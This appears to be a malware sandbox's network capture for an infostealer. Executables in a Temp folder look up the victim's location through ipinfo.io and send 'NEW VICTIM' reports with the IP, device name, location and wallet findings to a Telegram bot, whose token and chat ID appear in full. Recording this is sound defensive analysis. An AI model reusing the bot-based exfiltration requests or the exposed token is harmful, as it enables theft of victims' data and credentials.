2024-12-12 15:48:29 UTC	4915	IN	HTTP/1.1 200 OK Content-Type: image/png Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="output.png" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 156917 Last-Modified: Mon, 11 Nov 2024 02:30:33 GMT X-GUploader-UploadID: AFiumC6muWdqR7Ip6NGTdYp9M-ofi5iiuO3EE0abqpDK7cxNJg9Kek79aWKJXz6-7jUQ2B_ZiGc Date: Thu, 12 Dec 2024 15:48:29 GMT Expires: Thu, 12 Dec 2024 15:48:29 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=h6mvlQ== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 15:48:29 UTC	4915	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 b6 00 00 01 b6 08 06 00 00 00 13 09 a3 70 00 00 80 00 49 44 41 54 78 9c ec dd 07 7c 14 65 fa 07 f0 df 33 9b 0a 09 bd 9d 15 44 20 64 77 36 80 d8 d0 53 9a dc 59 00 5b d6 ce a9 e7 e9 9d 05 b0 23 2a 4c c0 82 67 c5 72 96 bb bf 9e e8 a9 24 58 41 3d 95 66 c3 16 85 ec ec 12 8a 8a 9e 05 0b 9d 00 29 bb f3 fc 3f bb 49 ee 28 d9 64 76 b3 33 ef 6c f6 fd 7e 3e 7e 3e b2 bb 33 ef 93 64 77 9f 79 cb 3c 6f 06 24 49 b2 ce a8 d3 ba 82 c2 c7 2b 8c 61 0c 14 02 74 08 08 3d c0 68 0f 80 40 a8 02 d3 06 10 af 23 c6 2a 03 fc 11 80 25 58 f4 da cf a2 43 97 a4 54 45 a2 03 90 a4 36 67 cc 98 f6 08 e5 fa 88 30 01 c0 71 00 94 04 ce f2 11 13 3d 03 64 3e 87 85 65 5b 2d 88 52 92 da 2c 99 d8 24 29 59 4e 3c b1 03 ea 32 27 12 d3 24 00 dd 92 Data Ascii: PNGIHDRpIDATx\|e3D dw6SY[#Lgr$XA=f)?I(dv3l~>~>3dwy<o$I+at=h@#%XCTE6g0q=d>e[-R,$)YN<2'$
2024-12-12 15:48:29 UTC	4870	IN	Data Raw: b8 8f 6d b0 aa aa 13 4c 25 b5 58 26 5c bf 63 68 76 d7 cd 7b 27 b5 86 36 04 d4 e8 92 a4 ff 71 b9 5c 31 df 83 59 59 59 09 ed b7 e6 76 bb ab 54 55 d5 5c 2e 97 4a f1 d7 58 ed 07 60 7e 43 79 ae c2 44 da 97 12 27 13 9b 43 31 33 05 02 81 09 86 61 7c 19 b9 02 8c e3 8a b1 d1 97 cc ec f3 7a bd a3 54 55 4d ca 0e c1 2e 97 ab c9 2f 08 22 11 c5 27 25 e9 7f 9a 9b 63 ab ae ae 6e d5 46 a2 85 85 85 6b 3d 1e 8f cf 30 8c d1 09 ec 8e d1 58 9e 6b 76 79 79 79 c7 d6 c4 21 99 27 13 9b 03 05 02 81 c3 03 81 c0 32 66 7e 3a c1 31 fe 92 9c 9c 1c 8f d7 eb 4d 6a 25 ff 70 38 dc e4 17 84 ec b1 49 a2 35 d7 63 cb cd cd 4d ca 0e d9 45 45 45 8b 36 6c d8 30 84 99 2f 03 f0 6b 1c 87 66 02 98 98 9d 9d fd 95 ae eb 93 4a 4b 4b e5 e7 c5 62 32 b1 39 c8 aa 55 ab f6 6b 28 83 f5 09 80 a3 e2 3c dc 00 a2 Data Ascii: mL%X&\chv{'6q\1YYYvTU\.JX`~CyD'C13a\|zTUM./"'%cnFk=0Xkvyyy!'2f~:1Mj%p8I5cMEEE6l0/kfJKKb29Uk(<
2024-12-12 15:48:29 UTC	1321	IN	Data Raw: 8c 51 20 10 18 bb 71 7b d5 a3 7f 7f 7b e9 fe cf bf ff 31 0c 13 c3 93 5d 3b e4 1b 63 06 b9 9f ef cf 35 17 6a 9a e6 8c 25 e4 a3 c6 17 82 30 48 61 2e 00 63 00 13 f6 03 a8 3d c0 1d 81 68 45 ff 1a 10 aa 86 f4 39 b8 5f df 5e 3d 3a 1c dc a3 1b 0e e9 d9 1d 45 bd 0f 42 7e 6e 4e a4 c7 36 d3 e3 f1 d8 ba 22 4f b8 52 2d 0b c0 53 00 9d 2b a0 f5 1d 60 f6 e1 2c ed 0d 01 6d ff 57 ea 24 b6 46 a5 33 fb 80 8d 1b 41 f8 03 80 9c 24 9c 31 08 c2 9d e0 81 2f a4 fb cd d7 66 04 02 81 a7 98 f9 c2 bd 1f 67 e6 81 5e af d7 f6 b1 f4 78 24 38 ec b8 25 72 2d bc 61 c3 86 47 46 8c 18 e1 8c 2f 7b 93 2a 2a 2a da 2b 8a 72 7d e0 bb 1f a6 ce 7a 71 41 a6 ff 1b 73 53 a0 9e 83 f6 af 3a a1 c8 f3 97 fb 26 5f fe ac e5 41 ee 6d ec d8 76 d8 49 a7 29 84 93 99 69 04 80 5e 89 9c 46 21 c2 c0 03 f6 43 f7 8e Data Ascii: Q q{{1];c5j%0Ha.c=hE9_^=:EB~nN6"OR-S+`,mW$F3A$1/fg^x$8%r-aGF/{***+r}zqAsS:&_AmvI)i^F!C
2024-12-12 15:48:29 UTC	1390	IN	Data Raw: c9 01 31 5f 38 fa d4 e1 44 ca 62 27 27 35 d4 6f 18 76 3e 6d aa 7b 13 27 9e d8 41 74 2c 52 eb a4 65 62 4b ab 6a 04 49 16 eb a2 40 51 14 5b 13 5b 45 45 c5 90 40 20 b0 ac 61 4b 19 b3 73 69 5f 30 73 a4 67 39 21 5d e6 d2 e2 e1 76 bb bf 54 55 f5 94 11 ea c0 71 2f df 34 e9 1b 33 7b bf ed aa ad c5 cb 1f 97 7b a7 fc df f3 df 4c 7b ec c9 07 96 2c 59 b2 67 f1 84 d1 e3 4e 26 e6 7f 03 e8 68 71 f8 49 c2 23 a9 36 eb 1d 99 dc 52 5b 5a 26 36 d9 63 4b 9c e8 1e 9b df ef ef ac eb fa 6c 45 51 3e 8d 63 2e 6d 33 80 c9 95 95 95 47 78 bd de 8f 2c 0e 31 e5 79 3c 9e f9 a1 ea ea c2 cb 7f 3f b2 64 de f5 57 d4 1c ef 1e d0 e2 31 5f ae ff d9 75 db bc d7 26 dd 31 ff ed 5f 1e 2d 7b e9 94 e8 83 23 c6 1f 49 4c 73 01 a4 da 3e 70 47 50 6d d6 ab 38 f1 c4 54 8b 5b 6a 60 45 69 2a c7 93 3d b6 c4 Data Ascii: 1_8Db''5ov>m{'At,RebKjI@Q[[EE@ aKsi_0sg9!]vTUq/43{{L{,YgN&hqI#6R[Z&6cKlEQ>c.m3Gx,1y<?dW1_u&1_-{#ILs>pGPm8T[j`Ei*=
2024-12-12 15:48:29 UTC	1390	IN	Data Raw: 13 11 fd c1 ed 76 1f 2f 93 5a ea 61 d0 6f 45 c7 20 04 e3 38 d1 21 48 b1 a5 65 62 4b eb ca 23 44 97 88 f8 bb bf ba f5 3f 30 f6 dc ee 26 c4 cc f7 e7 e4 e4 0c f0 78 3c 73 88 28 0d 2f fc 53 5c fd ea c0 be a2 c3 10 41 01 62 de ce 22 89 97 96 43 91 69 dd 63 63 9c 26 a2 d9 f5 75 3b b1 b2 7a 0b 3c b9 9d 23 ff 5c 6a 18 c6 55 45 45 45 01 11 b1 48 49 b2 a1 ba 1f 6c de 39 dd 29 98 94 96 77 5f 95 84 49 cb c4 96 b6 3d b6 17 6f 3b 18 e1 70 6f 51 cd 2f db f9 f3 36 b5 5d 97 ab dc 6e f7 33 b2 87 d6 06 b8 70 68 fa 6e c1 c9 fd 44 47 20 c5 96 96 43 91 69 db 63 0b 87 3d 22 9b 7f fc d7 55 af cb 61 c7 36 c4 50 ba 88 0e 41 a0 74 fe d9 1d 2f 2d 13 5b da f6 d8 80 83 44 36 5e cb c6 7e 22 db 97 92 8c 90 2f 3a 04 81 da a1 b8 38 2d 87 61 53 41 5a 26 b6 b4 ed b1 11 89 fe 22 6a 7d 2d 4a Data Ascii: v/ZaoE 8!HebK#D?0&x<s(/S\Ab"Cicc&u;z<#\jUEEEHIl9)w_I=o;poQ/6]n3phnDG Cic="Ua6PAt/-[D6^~"/:8-aSAZ&"j}-J
2024-12-12 15:48:29 UTC	1390	IN	Data Raw: 66 5f d7 50 8e ca 11 fc 7e ff 68 8a f4 2a e3 1f 92 dd c0 cc f7 b8 5c ae fb dd 6e 77 6d b3 af 9c 37 b3 1f 98 4f 06 f3 71 00 0a 33 48 39 28 c4 46 6e b6 e2 42 47 25 13 bd b3 f3 a1 e6 74 46 2e 65 dc f9 f0 7b c1 5b ea 6f d6 8d 4f 30 18 1c 69 18 c6 7d 00 8a 4c bc 3c 72 fe 7f 19 86 71 9d 9c 7f 73 a8 91 a7 5e 40 c4 73 44 87 61 85 1e 9d 3a 18 af dd 34 59 d9 ab b7 d6 94 85 8a a2 5c ef 76 bb 57 d8 13 99 35 64 62 4b a6 25 5a 06 36 d0 6d 60 dc e0 b0 d8 be 03 f1 d9 a2 7b 6f c1 60 f0 08 c3 30 ee 02 30 3c ce 43 77 12 d1 43 d9 d9 d9 77 f4 eb d7 2f a1 aa 23 81 40 60 02 33 3f dd c4 53 13 54 55 7d 26 91 73 62 cf f9 b7 bf 02 e8 69 e2 90 2d cc 3c ab ad ce 6d a4 ba 4e e3 ce 29 df ba 63 e7 61 a2 e3 48 b6 03 ba 77 bd e8 cd 5b ae 29 60 e6 ab 4d 8c 20 19 44 f4 62 38 1c be b1 a8 a8 Data Ascii: f_P~h*\nwm7Oq3H9(FnBG%tF.e{[oO0i}L<rqs^@sDa:4Y\vW5dbK%Z6m`{o`00<CwCw/#@`3?STU}&sbi-<mN)caHw[)`M Db8
2024-12-12 15:48:29 UTC	1390	IN	Data Raw: d8 5d 61 21 11 5d e7 f1 78 2a 12 0b 33 71 4e 4a 6c d8 f3 fe b7 bb 00 34 b9 2f ce 5e 22 1f c6 7b f2 f2 f2 66 f5 e9 d3 a7 3a e9 01 cd d3 0a 60 28 8f 00 3c 32 e9 e7 ae f7 31 14 ba dc 8e 1e 1c 33 93 ae eb 67 2a 8a f2 57 66 ee 6d e2 90 3a 00 8f d6 d4 d4 4c 8b 39 7a 70 e2 89 1d a8 2e eb 19 30 c6 25 3d e0 e4 d8 c9 e0 cb b0 e8 b5 a4 57 ee 0f 04 02 87 37 bc 4f cd 5c ec 54 01 b8 77 fb f6 ed 77 0d 1b 36 6c 57 b2 63 31 4b 26 b6 78 2c d1 32 f0 2b 95 9b ac 34 91 5a 18 e7 c6 aa 91 88 fa f9 89 bc 70 38 7c 05 11 45 7a aa f9 71 9e fd f3 86 1e 87 b0 72 3d 4e 4b 6c 8d 12 98 7f fb 8e 88 6e 71 bb dd cf 50 32 7a 40 d1 32 64 33 af 07 f3 4c 1b 4a bf 85 41 7c 17 ba 61 3a 46 68 21 2b 1a 68 28 02 70 3f 80 61 26 0f 59 00 60 b2 aa aa 5f 99 78 2d 61 d4 b8 89 04 fa ab a0 32 79 4d 63 ac Data Ascii: ]a!]x3qNJl4/^"{f:`(<213gWfm:L9zp.0%=W7O\Tww6lWc1K&x,2+4Zp8\|Ezqr=NKlnqP2z@2d3LJA\|a:Fh!+h(p?a&Y`_x-a2yMc
2024-12-12 15:48:29 UTC	1390	IN	Data Raw: 3e 10 0c 06 b3 0c c3 f8 4b c3 76 40 66 4a 3c 59 33 8f 66 b1 55 ab 56 ed b7 69 db f6 1f 8e b9 e9 b6 7d 9e cb ca 70 7d 53 f3 d6 4b 29 57 d2 0b 7b ee 92 3f cb 64 e9 c1 55 0d c3 93 ff db 19 bf 74 c6 61 00 47 7a dc ed 2c 0e f7 13 6c ee f5 5b 5c 76 59 9d c5 ed 98 62 fd 4d d2 75 a1 51 e9 94 d4 22 96 55 35 b9 0a 7b 33 33 4f d9 be 7d 7b 7f af d7 fb 44 2a 25 b5 b6 24 f2 81 f7 7a bd 65 35 35 35 85 91 bf 47 c3 0d b1 cd 69 0f 60 7a be c2 6b 1c 9c d4 10 fd e2 0a 85 fe 5b b7 34 10 08 8c 35 0c a3 12 c0 03 26 93 da 02 c3 30 0a 54 55 9d 94 4a 49 ad 25 6c 38 6e 6f 47 d3 88 c8 88 bc 57 15 45 19 c8 cc 97 01 f8 b5 85 43 0a 88 a8 34 10 08 2c ab a8 a8 f8 2d 4a ef cb 05 b8 d4 86 a4 16 71 24 3a fd 74 8d 0d ed 98 62 7d 62 53 8c 64 95 16 4a 19 eb 6a b7 e3 97 d0 7f 17 d7 d5 11 d1 13 Data Ascii: >Kv@fJ<Y3fUVi}p}SK)W{?dUtaGz,l[\vYbMuQ"U5{33O}{D*%$ze555Gi`zk[45&0TUJI%l8noGWEC4,-Jq$:tb}bSdJj
2024-12-12 15:48:29 UTC	1390	IN	Data Raw: 09 73 6b 8d ec b9 9a a1 e8 d6 fb e9 e2 5b f8 a6 a7 65 25 f5 36 c9 37 65 2b 88 e7 8b 0e c3 3c 7a 17 be 5b e5 fc 5a 23 4a e3 1e 5b 23 9f 36 1d e0 87 2d 3a fb 66 80 4f c6 99 b7 ae b5 e8 fc 09 b1 e7 8f ce c6 4b f5 bf 80 74 40 4f 82 c8 8e ae bf 64 17 c6 bd a2 43 30 8d f9 3e d1 21 38 4c fa ce b1 ed ce a7 5d 05 a6 9b 93 3c 2d f4 15 14 fa 2d 7c da a7 49 3c 67 52 d8 93 d8 7c 5a 15 08 56 5d 31 38 c9 0e 84 8c bf 89 0e 42 4a b2 e8 07 37 25 e6 da 56 c0 37 6d 81 e8 20 1c 25 cd b6 ad 69 d6 59 d3 ee 00 f1 68 00 5f b6 f2 4c 0c c6 53 a8 e5 21 38 73 5a 30 49 d1 25 95 7d dd 74 e6 07 c4 dc 57 61 a3 48 f2 3e 57 13 b9 75 ad 64 15 c3 b8 1a 80 c3 57 1a f2 b5 72 b4 60 4f 9c 26 1b 8d 9a 56 ac 2d c5 0e 56 c1 b8 06 c0 0f f1 1c 1a b9 42 c8 20 d7 3b 30 78 18 ce 9a 7e 31 ce d7 1c 5b 0f Data Ascii: sk[e%67e+<z[Z#J[#6-:fOKt@OdC0>!8L]<--\|I<gR\|ZV]18BJ7%V7m %iYh_LS!8sZ0I%}tWaH>WudWr`O&V-VB ;0x~1[
2024-12-12 15:48:29 UTC	1390	IN	Data Raw: 8f ee 59 d3 1b 5a 86 bb fe b5 84 10 b1 ac aa 52 ee d8 e2 4c f4 25 b6 9f 3b 3e b5 7a c9 cf db 1a 7d a2 aa 5f 02 b8 a4 91 33 f8 d1 4b af 59 6f 5c 80 42 08 53 25 27 c9 1d 5b 9c 89 fe c4 26 c2 e7 83 89 6d 91 58 75 29 98 2e fc e3 77 05 03 bb da 5a c1 4a 0a da 58 12 71 8e 2d 1d 99 49 6d 71 76 62 9a d9 51 8a 78 33 60 e8 79 00 2e 86 82 6e 0a 73 87 4b 1e 71 b6 fe 5d 2f 47 d3 c7 fb 6a 25 b1 c5 19 49 6c e2 a7 16 bc 6a c3 d1 c3 7f 04 f1 dd 40 75 5f 30 d5 95 71 5c 15 07 eb fe f9 b9 54 8b f5 65 e4 8c eb 06 9f e5 1f f8 c3 98 9d 66 84 2c e2 c0 95 43 4e 57 34 ba 97 81 3f 02 7c 5e dd d7 f8 78 3b a0 d2 63 15 f8 78 c5 d7 4d 9f 5b 5d 25 a5 c8 38 23 bf 70 71 1c 33 21 67 dc 9f 51 76 e8 3b 10 ff 0b c0 65 7a de 1f e5 be da 0e 00 46 c3 e2 fb 06 1f 3b 5f 47 8e 33 12 16 d5 8b 58 31 Data Ascii: YZRL%;>z}_3KYo\BS%'[&mXu).wZJXq-ImqvbQx3`y.nsKq]/Gj%Ilj@u_0q\Tef,CNW4?\|^x;cxM[]%8#pq3!gQv;ezF;_G3X1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49900	34.117.59.81	443	8120	C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 15:48:27 UTC	91	OUT	GET /json HTTP/1.1 User-Agent: IPInfoFetcher Host: ipinfo.io Cache-Control: no-cache
2024-12-12 15:48:27 UTC	345	IN	HTTP/1.1 200 OK access-control-allow-origin: * Content-Length: 321 content-type: application/json; charset=utf-8 date: Thu, 12 Dec 2024 15:48:27 GMT x-content-type-options: nosniff via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 15:48:27 UTC	321	IN	Data Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a Data Ascii: { "ip": "8.46.123.189", "hostname": "static-cpe-8-46-123-189.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.10	49903	149.154.167.220	443	8092	C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 15:48:27 UTC	513	OUT	GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20921702%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1 User-Agent: TelegramBot Host: api.telegram.org Cache-Control: no-cache
2024-12-12 15:48:28 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 12 Dec 2024 15:48:28 GMT Content-Type: application/json Content-Length: 776 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-12 15:48:28 UTC	776	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 33 30 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 35 35 38 37 38 35 34 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 32 37 30 30 39 37 37 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 61 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 33 34 5c 75 30 34 33 30 5c 75 30 34 33 64 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 33 62 5c 75 30 34 33 65 5c 75 30 34 33 32 22 2c Data Ascii: {"ok":true,"result":{"message_id":3300,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432",

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.10	49908	149.154.167.220	443	8120	C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 15:48:29 UTC	513	OUT	GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20921702%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1 User-Agent: TelegramBot Host: api.telegram.org Cache-Control: no-cache
2024-12-12 15:48:29 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 12 Dec 2024 15:48:29 GMT Content-Type: application/json Content-Length: 776 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-12 15:48:29 UTC	776	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 33 30 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 35 35 38 37 38 35 34 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 32 37 30 30 39 37 37 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 61 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 33 34 5c 75 30 34 33 30 5c 75 30 34 33 64 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 33 62 5c 75 30 34 33 65 5c 75 30 34 33 32 22 2c Data Ascii: {"ok":true,"result":{"message_id":3301,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432",

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.10	49909	34.117.59.81	443	1868	C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 15:48:29 UTC	91	OUT	GET /json HTTP/1.1 User-Agent: IPInfoFetcher Host: ipinfo.io Cache-Control: no-cache
2024-12-12 15:48:29 UTC	345	IN	HTTP/1.1 200 OK access-control-allow-origin: * Content-Length: 321 content-type: application/json; charset=utf-8 date: Thu, 12 Dec 2024 15:48:29 GMT x-content-type-options: nosniff via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 15:48:29 UTC	321	IN	Data Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a Data Ascii: { "ip": "8.46.123.189", "hostname": "static-cpe-8-46-123-189.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.10	49917	34.117.59.81	443	1528	C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 15:48:31 UTC	91	OUT	GET /json HTTP/1.1 User-Agent: IPInfoFetcher Host: ipinfo.io Cache-Control: no-cache
2024-12-12 15:48:31 UTC	345	IN	HTTP/1.1 200 OK access-control-allow-origin: * Content-Length: 321 content-type: application/json; charset=utf-8 date: Thu, 12 Dec 2024 15:48:31 GMT x-content-type-options: nosniff via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 15:48:31 UTC	321	IN	Data Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a Data Ascii: { "ip": "8.46.123.189", "hostname": "static-cpe-8-46-123-189.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.10	49916	149.154.167.220	443	1868	C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe

Timestamp	Bytes transferred	Direction	Data
